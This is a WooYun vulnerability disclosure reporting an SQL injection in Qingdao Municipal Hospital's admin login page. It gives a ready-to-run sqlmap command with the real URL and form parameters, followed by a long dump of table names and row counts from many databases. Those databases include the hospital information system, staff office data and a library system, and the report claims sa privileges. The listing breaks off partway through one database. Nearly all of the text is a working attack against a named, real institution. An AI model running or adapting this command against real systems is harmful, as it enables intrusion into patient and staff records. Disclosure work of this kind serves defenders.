漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0112087
漏洞标题:青岛市市立医院SQL注入漏洞(sa权限/涉及多库可导致百万级数据泄漏)
相关厂商:青岛市市立医院
漏洞作者: AM47
提交时间:2015-05-05 11:16
修复时间:2015-06-19 11:16
公开时间:2015-06-19 11:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
青岛市市立医院注入漏洞(sa权限,涉及多库,百万级数据泄漏)
详细说明:
sqlmap -u "http://qdslyy.qdslyy.cn/Admin/login.aspx?ReturnUrl=%2fadmin%2findex.aspx" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEyNzAzNjAwOWRkLbCywYkVLtK4TrmrotfkIv8wL%2F4%3D&__EVENTVALIDATION=%2FwEWBAKW5ajEAQLs0bLrBgLs0fbZDAKM54rGBtAP4inqx%2Bwe47Ni0gaJfA3TDYZv&TextBox1=123&TextBox2=123&Button1=" --current-user
Database: iofficebak
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.ifBbsRead | 869278 |
| dbo.jj_z_date | 652840 |
| dbo.gz_t_date | 217667 |
| dbo.jj_z_hz | 127580 |
| dbo.yzb_z_date | 87569 |
| dbo.gz_xg_lsjl | 83942 |
| dbo.fmDocCtl | 63864 |
| dbo.ssInsInf2 | 57240 |
| dbo.ssInsInf2 | 57240 |
| dbo.jj_fbp | 55405 |
| dbo.gz_kz_date | 34787 |
| dbo.fmDocFoldCtl | 14625 |
| dbo.mrPosition | 11958 |
| dbo.mlMessageIDs | 9392 |
| dbo.mlMessageIDs | 9392 |
| dbo.ykt_EmplyOther | 9367 |
| dbo.ykt_EmplyOther | 9367 |
| dbo.gz_d_zdk | 8445 |
| dbo.ioEmpCookie | 8296 |
| dbo.ssDesktopEmp | 7423 |
| dbo.FileCont | 6488 |
| dbo.cpNote | 5820 |
| dbo.ifForumThreadRead | 5230 |
| dbo.ifMsgOptionEmpID | 5060 |
| dbo.ifMsgOptionEmpID | 5060 |
| dbo.yzb_z_hz | 4129 |
| dbo.mrBaseInf | 3989 |
| dbo.gz_jsgs | 3666 |
| dbo.mrArchive | 2465 |
| dbo.InfoPostAreaCodes | 2320 |
| dbo.bsFreeCtl | 1986 |
| dbo.bsFreeCtl | 1986 |
| dbo.Sheet1 | 1964 |
| dbo.sysconstraints | 1780 |
| dbo.mlAttach | 1560 |
| dbo.department | 1251 |
| dbo.fmDocAtt | 1167 |
| dbo.fmDocAtt | 1167 |
| dbo.gz_menu | 982 |
| dbo.ssPwdhisthory | 976 |
| dbo.ykt_rzsq_mx | 917 |
| dbo.gs_photo | 833 |
| dbo.ifForumPosts | 728 |
| dbo.ykt_User_Log | 580 |
| dbo.mlPsGroup | 519 |
| dbo.z_test | 410 |
| dbo.wmFlowAction | 343 |
| dbo.InfoLawRegulations | 311 |
| dbo.vw_InfoLawRegulations | 311 |
| dbo.ssModRightSet | 304 |
| dbo.mlPsAdd | 283 |
| dbo.wmFlowStep | 250 |
| dbo.VIEW_dep | 234 |
| dbo.ioSchHistory | 216 |
| dbo.gz_xx_z | 206 |
| dbo.ifForumThread | 192 |
| dbo.ssTreeAssignNode | 190 |
| dbo.wmDocStep | 185 |
| dbo.mrRoleEmp | 176 |
| dbo.mrRoleEmp | 176 |
| dbo.bsUniversity | 166 |
| dbo.ykt_ryxxzdk | 160 |
| dbo.fmDocFolder | 152 |
| dbo.wmStepAssgn | 152 |
| dbo.Sheet3 | 148 |
| dbo.ioDictionary | 145 |
| dbo.ssLogInfoHistory | 145 |
| dbo.ssLogInfoHistory | 145 |
| dbo.mrdepman | 131 |
| dbo.mrdepman | 131 |
| dbo.InfoCommonWebsites | 116 |
| dbo.vw_InfoCommonWebsites | 116 |
| dbo.ifMsgFolder | 108 |
| dbo.gjjzh | 104 |
| dbo.ssRemindEmp | 103 |
| dbo.wmDoneStep | 101 |
| dbo.Bone | 100 |
| dbo.ssFavUrl | 100 |
| dbo.InfoCommonPhones | 96 |
| dbo.bsSpecialty | 92 |
| dbo.ifFreeMsg | 90 |
| dbo.bsBordCtl | 79 |
| dbo.bsBordCtl | 79 |
| dbo.mlPsOption | 70 |
| dbo.gs_cwxx_gz_jl | 64 |
| dbo.gs_cwxx_gz_jl | 64 |
| dbo.iOfficeUpdate | 63 |
| dbo.ioDocModeBookmark | 60 |
| dbo.wmFlowCtl | 60 |
| dbo.ifForumEmpInf | 56 |
| dbo.bsMrEmpInfSel | 53 |
| dbo.wmModCode | 51 |
| dbo.ifForumSettings | 50 |
| dbo.ifForumSettings | 50 |
| dbo.bsTech | 44 |
| dbo.wmFlowSet | 41 |
| dbo.bsQuli | 40 |
| dbo.ifchattalk | 40 |
| dbo.InfoMetrics | 40 |
| dbo.vw_InfoMetrics | 40 |
| dbo.wmActionConSel | 36 |
| dbo.InfoLawRegulationCategories | 34 |
| dbo.xl | 34 |
| dbo.iOfficeScope | 31 |
| dbo.fmtree | 30 |
| dbo.mlPsSet | 30 |
| dbo.ifMsgInFolder | 29 |
| dbo.ioDocMark | 29 |
| dbo.ioSchTypeSet | 28 |
| dbo.arcKindSysFieldSet | 27 |
| dbo.wmActionCon | 27 |
| dbo.ioSchException | 25 |
| dbo.mlGroupMem | 25 |
| dbo.iOfficeRight | 24 |
| dbo.ioSchItemSet | 24 |
| dbo.wmFlowDocAtt | 23 |
| dbo.wmFlowDocAtt | 23 |
| dbo.wmActiveStep | 22 |
| dbo.pbcatedt | 21 |
| dbo.arcKindCtl | 20 |
| dbo.arcKindCtl | 20 |
| dbo.crmStoreType | 20 |
| dbo.mtDepEmp | 20 |
| dbo.pbcatfmt | 20 |
| dbo.ssModeName | 20 |
| dbo.ssTreeAssignCtl | 19 |
| dbo.ssTreeAssignCtl | 19 |
| dbo.ifForumSmiles | 18 |
| dbo.ioMarkSet | 18 |
| dbo.mtResource | 18 |
| dbo.vw_InfoCommonPhones | 18 |
| dbo.systemp | 17 |
| dbo.bsRoleType | 16 |
| dbo.ykt_EmployeeType | 16 |
| dbo.结果 | 16 |
| dbo.ifForumRanks | 15 |
| dbo.bsScheType | 14 |
| dbo.fmFileAtt | 14 |
| dbo.ifForumCtl | 14 |
| dbo.mr_rcgz_jl | 14 |
| dbo.bsFormCtl | 13 |
| dbo.bsFormCtl | 13 |
| dbo.bsPosition | 13 |
| dbo.sfDocType | 13 |
| dbo.xsfDocType | 13 |
| dbo.bsMrEdu | 12 |
| dbo.wmFlowSel | 12 |
| dbo.InfoCommonWebsiteCategories | 11 |
| dbo.ioCustomField | 11 |
| dbo.ssDesktopSet | 11 |
| dbo.ioSchedule | 10 |
| dbo.mlFolder | 10 |
| dbo.mrEmpSign | 10 |
| dbo.mtContent | 10 |
| dbo.ifForumCensorship | 9 |
| dbo.ifQurResult | 9 |
| dbo.arcKindFixField | 8 |
| dbo.bsWhither | 8 |
| dbo.InfoMetricCategories | 8 |
| dbo.ykt_rzm | 8 |
| dbo.cpDesign | 7 |
| dbo.FaxSet | 7 |
| dbo.ifForumFavorates | 7 |
| dbo.mtConType | 7 |
| dbo.mtRoom | 7 |
| dbo.xsfDocZihao | 7 |
| dbo.bsStation | 6 |
| dbo.cpReSch | 6 |
| dbo.mtAtt | 6 |
| dbo.scnFields | 6 |
| dbo.wmManContent | 6 |
| dbo.zyInDetail | 6 |
| dbo.ifForumEditNotes | 5 |
| dbo.ifForumGroups | 5 |
| dbo.ifmeetingman | 5 |
| dbo.InfoContacts | 5 |
| dbo.mr_main_xx | 5 |
| dbo.mrBranchman | 5 |
| dbo.mrBranchman | 5 |
| dbo.bsMrContact | 4 |
| dbo.bsPlace | 4 |
| dbo.gz_tpps | 4 |
| dbo.ifmeetingtalk | 4 |
| dbo.ifQurDepEmp | 4 |
| dbo.ifQurDepEmp | 4 |
| dbo.InfoCommonPhoneCategories | 4 |
| dbo.InfoLivingCategories | 4 |
| dbo.mlRefuseEmail | 4 |
| dbo.mrEmReimindSet | 4 |
| dbo.mtResStatus | 4 |
| dbo.ssQuota | 4 |
| dbo.zyClass | 4 |
| dbo.zyStoreCtl | 4 |
| dbo.zyStoreCtl | 4 |
| dbo.cpRoleProRe | 3 |
| dbo.faxCharge | 3 |
| dbo.ioDocTemplate | 3 |
| dbo.mtRoomStatus | 3 |
| dbo.ssRemindRe | 3 |
| dbo.syssegments | 3 |
| dbo.wmFlowTemp | 3 |
| dbo.wmOptionSet | 3 |
| dbo.zyInHead | 3 |
| dbo.zyPurchaseDetail | 3 |
| dbo.zyPurchaseDetail | 3 |
| dbo.zyRequiDetail | 3 |
| dbo.zyRequiDetail | 3 |
| dbo.arcRegDocAtt | 2 |
| dbo.arcRegDocAtt | 2 |
| dbo.arcSectCtl | 2 |
| dbo.arcSectCtl | 2 |
| dbo.bsMlGroup | 2 |
| dbo.bsMrEnterMode | 2 |
| dbo.carInfo | 2 |
| dbo.cpReport | 2 |
| dbo.dvEquitClass | 2 |
| dbo.dvEquitClass | 2 |
| dbo.ifchatCtl | 2 |
| dbo.mrVita | 2 |
| dbo.t_tree_topBar | 2 |
| dbo.t_tree_topBar | 2 |
| dbo.wmQuickEmp | 2 |
| dbo.wmQuickEmp | 2 |
| dbo.xsfDocDepWord | 2 |
| dbo.xsfDocDepWord | 2 |
| dbo.xsfDocKindWord | 2 |
| dbo.xsfDocNumberSet | 2 |
| dbo.xsfDocUnitWord | 2 |
| dbo.zyAgreeNeedDetail | 2 |
| dbo.zyAgreeNeedDetail | 2 |
| dbo.zyGoods | 2 |
| dbo.zyNeedDetail | 2 |
| dbo.zyNeedDetail | 2 |
| dbo.zyStoreGoods | 2 |
| dbo.arcStoreroom | 1 |
| dbo.bsSortSet | 1 |
| dbo.carMotorman | 1 |
| dbo.cpRoleCodeSet | 1 |
| dbo.hrKqGather | 1 |
| dbo.hrkqLate | 1 |
| dbo.hrKqMonthDate | 1 |
| dbo.ifChatTitle | 1 |
| dbo.ifForumStat | 1 |
| dbo.ifMarkList | 1 |
| dbo.ifmeetingtitle | 1 |
| dbo.InfoLivings | 1 |
| dbo.mlPsCard | 1 |
| dbo.psEmpBasInfo | 1 |
| dbo.ssCorpLogo | 1 |
| dbo.ssMobileSet | 1 |
| dbo.ssPwdSecSet | 1 |
| dbo.ssVerInfo | 1 |
| dbo.vw_InfoLivings | 1 |
| dbo.ykt_sysno | 1 |
| dbo.zySet | 1 |
+--------------------------------------+---------+
Database: qdslyy
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.lfsjmx | 1703260 |
| dbo.lfmx | 545935 |
| dbo.fkdbz1 | 16350 |
| dbo.fkdbz1 | 16350 |
| dbo.gs_gr_xc | 15972 |
| dbo.lffzjl | 9057 |
| dbo.gs_sw_dj | 7346 |
| dbo.gs_zj_tp_image | 5270 |
| dbo.gs_gr_persons | 2320 |
| dbo.gs_lyb_ml | 1380 |
| dbo.gs_lyb_ml | 1380 |
| dbo.gs_ks_tp_image | 1372 |
| dbo.gs_zj_expert | 1053 |
| dbo.gs_lan_ip | 1020 |
| dbo.gs_tel | 867 |
| dbo.gs_yywh_jb_zk | 864 |
| dbo.gs_news_article | 853 |
| dbo.gs_ylws_zjmz | 753 |
| dbo.gs_yyky_lw | 716 |
| dbo.gs_tree_menu_mx | 435 |
| dbo.gs_sjk_field | 335 |
| dbo.gs_sjk_field | 335 |
| dbo.gsljjxz_ljxzml | 303 |
| dbo.gs_dsj_ml | 297 |
| dbo.gs_dsj_ml | 297 |
| dbo.gs_ks_mc | 201 |
| dbo.gs_ks_tphd | 195 |
| dbo.gs_zj_psdw | 191 |
| dbo.gs_lan_wd | 168 |
| dbo.gs_news_type | 163 |
| dbo.gs_nwgl_jl_lfsml | 146 |
| dbo.gs_news_image | 143 |
| dbo.gs_news_tpxw | 137 |
| dbo.gs_ylws_mzzj_ks_ml | 124 |
| dbo.gsljjxz_ljxzmx | 112 |
| dbo.eWebEditor_Button | 111 |
| dbo.sysconstraints | 100 |
| dbo.eWebEditor_ToolBar | 77 |
| dbo.gs_ks_hj | 76 |
| dbo.gs_ks_hj | 76 |
| dbo.gsljjxz_fenlei | 72 |
| dbo.gs_xxcentr_mx | 62 |
| dbo.gs_xxcentr_mx | 62 |
| dbo.gs_yywh_jb_qhml | 61 |
| dbo.gs_cwxx_gz_jl | 57 |
| dbo.gs_cwxx_gz_jl | 57 |
| dbo.gs_down_load | 54 |
| dbo.gs_help | 54 |
| dbo.D99_CMD | 53 |
| dbo.gs_xxcentr_type | 35 |
| dbo.eWebEditor_Style | 30 |
| dbo.gs_nwgl_ggb | 30 |
| dbo.gs_ylws_tsyl | 30 |
| dbo.gs_yld_zk | 28 |
| dbo.gs_yyky_zz | 27 |
| dbo.gs_down_ljmx | 26 |
| dbo.gs_sjk_table | 26 |
| dbo.gs_ylws_mz_fy | 25 |
| dbo.gs_ks_sp | 22 |
| dbo.gs_tv_ljml | 21 |
| dbo.gs_tv_ljml | 21 |
| dbo.pbcatedt | 21 |
| dbo.gs_gr_jsb | 20 |
| dbo.gs_news_tpps | 20 |
| dbo.pbcatfmt | 20 |
| dbo.gs_news_ps | 19 |
| dbo.gs_tpps | 17 |
| dbo.gs_down_flname | 15 |
| dbo.gs_xxcentr_ps | 15 |
| dbo.gs_tree_menu_fl | 14 |
| dbo.gs_nwgl_jl_fwlt | 13 |
| dbo.gs_hyzx_mx | 12 |
| dbo.gs_tpxw | 12 |
| dbo.gs_ks_mp | 11 |
| dbo.gsljjxz_leixing | 11 |
| dbo.D99_Tmp | 10 |
| dbo.gs_computer | 10 |
| dbo.gs_news_example | 10 |
| dbo.gs_yl_show | 10 |
| dbo.gs_yyky_hj | 10 |
| dbo.tiezi | 10 |
| dbo.gs_yywh_gyym | 9 |
| dbo.gs_dns | 6 |
| dbo.gs_tv_xbfl | 6 |
| dbo.gs_web_admin | 6 |
| dbo.wdetabinf | 6 |
| dbo.gs_server | 5 |
| dbo.gs_tsgn_sz | 4 |
| dbo.syssegments | 3 |
| dbo.gs_kszj_gg | 2 |
| dbo.gs_lyb_tssq | 2 |
| dbo.gs_tracq_ml | 2 |
| dbo.gs_tv_ylml | 2 |
| dbo.gs_tv_ylmx | 2 |
| dbo.gs_ylsbps | 2 |
| dbo.gs_ylsbps | 2 |
| dbo.lfipwxyh | 2 |
| dbo.bankuai | 1 |
| dbo.D99_REG | 1 |
| dbo.eWebEditor_System | 1 |
| dbo.gs_down_ggao | 1 |
| dbo.gs_gr_webwd | 1 |
| dbo.gs_gr_zj_sp | 1 |
| dbo.gs_gr_zj_xc | 1 |
| dbo.gs_hyzx_ml | 1 |
| dbo.lfrs | 1 |
| dbo.luntan | 1 |
| dbo.pbcatcol | 1 |
| dbo.zxlfsml | 1 |
+--------------------------------------+---------+
Database: GdlisXP
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.标准书目源库 | 977677 |
| dbo.馆藏期刊典藏库 | 34731 |
| dbo.检索联接库 | 30333 |
| dbo.馆藏典藏库 | 23926 |
| dbo.检索一对多库 | 23084 |
| dbo.检索多对多库 | 21364 |
| dbo.auth_py | 20906 |
| dbo.拼音库 | 20902 |
| dbo.馆藏书目库 | 14504 |
| dbo.检索索书号库 | 14502 |
| dbo.采购库 | 14258 |
| dbo.cartable | 12320 |
| dbo.检索编码库 | 9992 |
| dbo.流通工作日 | 7305 |
| dbo.种次号库 | 4302 |
| dbo.期刊签到库 | 4233 |
| dbo.期刊签到分配库 | 4221 |
| dbo.auth_nam | 3085 |
| dbo.用户登录日志 | 2866 |
| dbo.流通日志 | 2854 |
| dbo.删除记录日志库 | 2082 |
| dbo.coper_n | 1023 |
| dbo.期刊采购库 | 919 |
| dbo.期刊采购分配库 | 916 |
| dbo.ISBN出版者库 | 858 |
| dbo.sysconstraints | 521 |
| dbo.流通库 | 448 |
| dbo.fufen | 414 |
| dbo.读者库 | 379 |
| dbo.MARC数据字典 | 376 |
| dbo.情报检索MARC数据字典 | 376 |
| dbo.检索途径生成方式 | 253 |
| dbo.流通参数定义 | 249 |
| dbo.web_分类检索 | 226 |
| dbo.检索途径定义 | 153 |
| dbo.期刊催缺临时表 | 110 |
| dbo.web书目显示定义 | 105 |
| dbo.系统定义 | 100 |
| dbo.流通单位统计 | 84 |
| dbo.读者单位 | 83 |
| dbo.数据选择库 | 56 |
| dbo.multi_py | 42 |
| dbo.报表模板定义 | 32 |
| dbo.流通工作量统计 | 24 |
| dbo.流通分类统计 | 23 |
| dbo.书目数据库定义 | 12 |
| dbo.web_bbs结构表 | 8 |
| dbo.管理员 | 8 |
| dbo.dtproperties | 7 |
| dbo.特种统计表 | 7 |
| dbo.temp11351 | 6 |
| dbo.XZ界面定义 | 6 |
| dbo.数据导入定义库 | 6 |
| dbo.authcode | 5 |
| dbo.采购批次号 | 5 |
| dbo.馆藏地址定义 | 5 |
| dbo.虚拟库室 | 4 |
| dbo.读者统计 | 4 |
| dbo.syssegments | 3 |
| dbo.期刊装订库 | 3 |
| dbo.系统用户信息 | 3 |
| dbo.采购经费库 | 3 |
| dbo.阅览室定义 | 3 |
| dbo.馆际互借库 | 3 |
| dbo.XZ_物品管理数据库 | 2 |
| dbo.系统参数定义 | 2 |
| dbo.temp30201 | 1 |
| dbo.分类馆藏统计 | 1 |
| dbo.成员馆库 | 1 |
| dbo.期刊分配部门定义 | 1 |
| dbo.流通库室分配表 | 1 |
| dbo.系统单位定义 | 1 |
| dbo.通知留言库 | 1 |
| dbo.阅览日志 | 1 |
+--------------------------------------+---------+
Database: zgbx
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.zgbx | 2408 |
| dbo.gai | 252 |
| dbo.sysconstraints | 3 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: HIS
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.XYF_List | 366254 |
| dbo.apply_List | 151257 |
| dbo.gs_qd_list | 85103 |
| dbo.Pb_Ryb | 52836 |
| dbo.cwbb_db | 31204 |
| dbo.SF_PatVisit | 26528 |
| dbo.PRICE_VIEW | 21224 |
| dbo.PRICE_ITEM_NAME_DICT | 17213 |
| dbo.DRUG_list | 15389 |
| dbo.hosp_safe_DiagDict | 14080 |
| dbo.DRUG_DICT | 12382 |
| dbo.PRICE_LIST | 12141 |
| dbo.gszxwd_jl | 11720 |
| dbo.DYNAMIC_CLINIC_SUB | 9925 |
| dbo.DYNAMIC_CLINIC_SUB | 9925 |
| dbo.Pb_Mxb | 5075 |
| dbo.Manager_Ip | 4674 |
| dbo.jtwz_ht_log | 3923 |
| dbo.gs_dzkq_mx | 3893 |
| dbo.STATISTICS_BED_DAY | 3317 |
| dbo.SF_List | 2581 |
| dbo.ky_db | 1696 |
| dbo.gs_rybd_rz | 1653 |
| dbo.SF_LOG | 1359 |
| dbo.DRUG_ENGLISH | 1351 |
| dbo.Material_List | 1256 |
| dbo.gs_week_js | 1114 |
| dbo.hosp_safe_zd_layer | 917 |
| dbo.hosp_safe_zd_layer | 917 |
| dbo.hosp_safe_yl_list | 825 |
| dbo.bb_zz | 810 |
| dbo.CW_Dep | 754 |
| dbo.Pb_Zb | 740 |
| dbo.XYF_CW_Dep1 | 735 |
| dbo.DEPT_DICT | 447 |
| dbo.cwbb_zd_name | 360 |
| dbo.DICT | 360 |
| dbo.Material_Device | 348 |
| dbo.gs_qd_z | 295 |
| dbo.mrDep | 214 |
| dbo.XYF_Dep | 200 |
| dbo.VIEW_dep | 196 |
| dbo.apply_cw_depdz | 174 |
| dbo.Material_IN | 134 |
| dbo.SF_Dep | 132 |
| dbo.BED_VIEW | 118 |
| dbo.SF_Admin | 113 |
| dbo.Pb_Zd | 62 |
| dbo.gs_dzkq_ks | 60 |
| dbo.sysconstraints | 56 |
| dbo.gszxwd_xgr | 55 |
| dbo.hosp_safe_yp_list | 48 |
| dbo.XYF_Dict | 47 |
| dbo.SF_Model | 46 |
| dbo.manager_adminlink | 41 |
| dbo.manager_adminlink | 41 |
| dbo.Manager_IPVlan | 41 |
| dbo.gs_tp_z | 40 |
| dbo.gs_tp_list | 39 |
| dbo.apply_Admin | 33 |
| dbo.cwbb_zdk | 29 |
| dbo.SF_Link | 25 |
| dbo.Clinic_Hour | 24 |
| dbo.gs_dzkq_z | 24 |
| dbo.gz_menu | 24 |
| dbo.gszxwd_gw_wl | 22 |
| dbo.gszxwd_gw_wl | 22 |
| dbo.hosp_safe_qx_list1 | 21 |
| dbo.hosp_safe_qx_list1 | 21 |
| dbo.pbcatedt | 21 |
| dbo.apply_Link | 20 |
| dbo.hosp_safe_admin | 20 |
| dbo.pbcatfmt | 20 |
| dbo.SF_WJ_XM | 17 |
| dbo.SF_WJ_XM | 17 |
| dbo.hosp_safe_list1 | 14 |
| dbo.hosp_safe_list1 | 14 |
| dbo.XYF_TJ_Dict | 14 |
| dbo.BILL_ITEM_CLASS_DICT | 13 |
| dbo.Medical_list | 13 |
| dbo.WH_CLASS_DICT | 13 |
| dbo.bedmonth | 12 |
| dbo.WH_DownLoad_Dict | 12 |
| dbo.SF_Dict | 11 |
| dbo.apply_Dep_Class | 9 |
| dbo.apply_Dep_Class | 9 |
| dbo.gs_gw_tpps | 8 |
| dbo.XYF_Admin | 8 |
| dbo.D99_Tmp | 7 |
| dbo.ggsjk_grzl | 6 |
| dbo.gz_d_zdk | 6 |
| dbo.Pb_Xz_DZ | 6 |
| dbo.apply_Pro_Class | 5 |
| dbo.apply_Pro_Class | 5 |
| dbo.gz_jsgs | 5 |
| dbo.ggsjk_grmx | 4 |
| dbo.WH_DETAIL | 4 |
| dbo.gs_tp_tpps | 3 |
| dbo.syssegments | 3 |
| dbo.gs_mzyy_djb | 2 |
| dbo.apply_MK | 1 |
| dbo.gs_ryld_rz | 1 |
| dbo.gz_tpps | 1 |
| dbo.WH_DownLoad_List | 1 |
+--------------------------------------+---------+
Database: jfsoftzh
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.wastebook | 52437 |
| dbo.students | 4851 |
| dbo.sysconstraints | 135 |
| dbo.user_module | 89 |
| dbo.operator_log | 45 |
| dbo.pk_kjtime | 42 |
| dbo.pk_kjset | 14 |
| dbo.std_sf | 13 |
| dbo.std_image | 8 |
| dbo.user_glnx | 8 |
| dbo.equipment_style | 4 |
| dbo.user_rightmodule | 4 |
| dbo.std_shxm | 3 |
| dbo.syssegments | 3 |
| dbo.jf_address | 2 |
| dbo.sendmsg | 2 |
| dbo.mystatus | 1 |
| dbo.Parameters | 1 |
| dbo.pk_firstdate | 1 |
| dbo.pk_yyparam | 1 |
| dbo.screg | 1 |
| dbo.std_class | 1 |
| dbo.users | 1 |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.roysched | 86 |
| dbo.employee | 43 |
| dbo.sysconstraints | 34 |
| dbo.titleauthor | 25 |
| dbo.titleview | 25 |
| dbo.authors | 23 |
| dbo.sales | 21 |
| dbo.titles | 18 |
| dbo.jobs | 14 |
| dbo.pub_info | 8 |
| dbo.publishers | 8 |
| dbo.stores | 6 |
| dbo.discounts | 3 |
| dbo.syssegments | 3 |
| dbo.mssql001 | 2 |
| dbo.cmdsql | 1 |
+--------------------------------------+---------+
Database: test
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Product | 102 |
| dbo.News | 4 |
| dbo.BigClass_News | 3 |
| dbo.Link | 3 |
| dbo.syssegments | 3 |
| dbo.FeedBack | 2 |
| dbo.sysconstraints | 1 |
+--------------------------------------+---------+
Database: kp
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.kp_xm_score | 95801 |
| dbo.cmp_yjzx | 10498 |
| dbo.kp_xm_khry1 | 907 |
| dbo.kp_xm_khry1 | 907 |
| dbo.kp_xm_pwqz | 806 |
| dbo.kp_xm_nr | 226 |
| dbo.kp_xm_pw | 121 |
| dbo.kp_xm_admin | 10 |
| dbo.kp_xm_admin | 10 |
| dbo.sysconstraints | 5 |
| dbo.syssegments | 3 |
| dbo.page | 1 |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS | 3617 |
| INFORMATION_SCHEMA.ROUTINES | 1019 |
| dbo.spt_values | 730 |
| INFORMATION_SCHEMA.COLUMNS | 392 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 302 |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS | 159 |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 63 |
| INFORMATION_SCHEMA.TABLES | 36 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 34 |
| dbo.spt_server_info | 29 |
| INFORMATION_SCHEMA.VIEWS | 26 |
| dbo.spt_provider_types | 25 |
| INFORMATION_SCHEMA.SCHEMATA | 23 |
| dbo.spt_datatype_info_ext | 10 |
| dbo.spt_datatype_info_ext | 10 |
| dbo.syslogins | 5 |
| dbo.syssegments | 3 |
| dbo.MSreplication_options | 2 |
| dbo.spt_monitor | 1 |
| dbo.sysconstraints | 1 |
| dbo.sysoledbusers | 1 |
+--------------------------------------+---------+
Database: oa
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.syssegments | 3 |
| dbo.sysconstraints | 2 |
+--------------------------------------+---------+
Database: webdisk
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.AllPath | 3713 |
| dbo.DownShow | 877 |
| dbo.Admin_Log | 90 |
| dbo.Admin_Log | 90 |
| dbo.kind | 52 |
| dbo.ly | 32 |
| dbo.reg | 32 |
| dbo.Menu | 31 |
| dbo.sysconstraints | 16 |
| dbo.Message | 8 |
| dbo.level | 7 |
| dbo.style | 4 |
| dbo.team | 4 |
| dbo.CopyUrl | 3 |
| dbo.Friend | 3 |
| dbo.syssegments | 3 |
| dbo.template | 2 |
| dbo.Config | 1 |
| dbo.jb | 1 |
| dbo.login | 1 |
+--------------------------------------+---------+
Database: asd
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Jk_news | 10000 |
| dbo.sysconstraints | 8 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.backupfile | 42721 |
| dbo.backupset | 21375 |
| dbo.backupmediafamily | 21348 |
| dbo.backupmediaset | 21348 |
| dbo.RTblRelships | 6922 |
| dbo.RTblIfaceHier | 3349 |
| dbo.RTblVersionAdminInfo | 2333 |
| dbo.RTblVersions | 2333 |
| dbo.RTblNamedObj | 2196 |
| dbo.RTblIfaceMem | 1189 |
| dbo.sysdbmaintplan_history | 1000 |
| dbo.RTblPropDefs | 797 |
| dbo.RTblClassDefs | 537 |
| dbo.RTblIfaceDefs | 453 |
| dbo.RTblProps | 393 |
| dbo.RTblRelColDefs | 320 |
| dbo.sysjobhistory | 200 |
| dbo.RTblRelshipDefs | 144 |
| dbo.RTblParameterDef | 136 |
| dbo.sysconstraints | 101 |
| dbo.RTblClassExtension | 69 |
| dbo.RTblSites | 44 |
| dbo.RTblRelshipProps | 28 |
| dbo.syscategories | 19 |
| dbo.RTblTypeLibs | 17 |
| dbo.sysdbmaintplan_databases | 14 |
| dbo.restorefilegroup | 12 |
| dbo.restorefilegroup | 12 |
| dbo.restorehistory | 12 |
| dbo.sysalerts | 9 |
| dbo.sysdtscategories | 3 |
| dbo.sysjobs_view | 3 |
| dbo.sysjobs_view | 3 |
| dbo.sysjobsteps | 3 |
| dbo.syssegments | 3 |
| dbo.sysdbmaintplan_jobs | 2 |
| dbo.sysdbmaintplans | 2 |
| dbo.sysjobschedules | 2 |
| dbo.sysjobservers | 2 |
| dbo.RTblDatabaseVersion | 1 |
| dbo.syscachedcredentials | 1 |
| dbo.systargetservers_view | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------+---------+
Database: model
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: xod_database
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.LogTable | 17773 |
| dbo.ProgramTable | 83 |
| dbo.sysconstraints | 16 |
| dbo.zaxiang | 11 |
| dbo.ChannelTable | 5 |
| dbo.LoginServerTable | 3 |
| dbo.syssegments | 3 |
| dbo.downtable | 2 |
| dbo.Admin | 1 |
| dbo.groupname | 1 |
| dbo.KHSysSetTable | 1 |
| dbo.UserTable | 1 |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details Extended] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.[Summary of Sales by Quarter] | 809 |
| dbo.[Summary of Sales by Year] | 809 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.Customers | 91 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.[Sales by Category] | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
